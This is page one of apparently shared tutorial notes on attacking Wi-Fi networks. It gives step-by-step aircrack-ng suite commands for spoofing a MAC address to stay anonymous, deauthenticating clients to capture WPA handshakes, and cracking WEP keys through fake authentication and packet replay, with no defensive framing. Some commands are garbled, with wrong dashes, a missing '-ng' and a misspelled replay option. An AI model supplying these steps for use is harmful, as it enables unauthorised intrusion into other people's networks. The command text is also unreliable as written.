You are on page 1of 2

NETWORK HACKING

Before attacking a target, we have to gather useful information first.


Use tool like airodump-ng to collect useful information. But before that we need to gain anonymity
of our personal computer by changing the mac address of the wireless adapter.

To change the mac address of the wireless adapter we need to follow the following steps;
1. Turn off the interface you want to change the MAC address [ #ifconfig interface down].
2. Now change the MAC address [ #ifconfig interface hw ether newMac_Address ]
3. Turn on the interface [ #ifconfig interface up ]

In order to capture packets that passes around we need to change the mode of the interface from
managed to monitor, therefore to achieve this we need to follow the following steps;
1. Turn off the interface you want to change the Mode [ #ifconfig interface down].
2. Use iwconfig command to change the mode [ #iwconfig interface mode monitor ]
3. Turn on the interface [ #ifconfig interface up ]

Now, use the application to capture useful information that will be used to perform attacks.
#airodump-ng interface

The above command does return a number of networks that are available around you, to get more
information on a particular network use the following command;
#airodump-ng –-bssid BSSID –-channel CH –-write filename interface

HOW CAN I DEAUTH A USER FROM A NETWORK?


Sometimes we use this method of de-authenticating a client from a network in order to collect
useful information ( packet(4) ) called wpa Handshake. Which is used to crack wpa / wpa2
passwords. In order to achieve this run the following command;
#aireplay –-deauth -a networkMac -c targetMac interface

CRACKING WEP AUTHENTICATION


In order to crack WEP authentication, we need to capture a large number of packets / IVs. Then
analyze the captured Packets and crack the Key.

So we need to run the following command to capture the packets;

#airodump-ng –-bssid BSSID –-channel CH –-write filename interface

Use a tool called aircrack-ng to crack the password from the filename.cap .

#aircrack-ng filename.cap

Case: A network is not Busy, What to do?

We use a method called fake Authentication, This method associates your wireless interface with
the target before launching attack to perform that do the following;
1. #aireplay-ng –-fakeauth delay_Time(s) -a BSSID -h unspec(replace {-} with {:})
interface

Communicating with the Access Point


1. #aireplay-ng –-arreplay -b BSSID -h unspec interface

2. #airodump-ng –-bssid BSSID –-channel CH –-write filename interface

Use a tool called aircrack-ng to crack the password from the filename.cap .

1. #aircrack-ng filename.cap

You might also like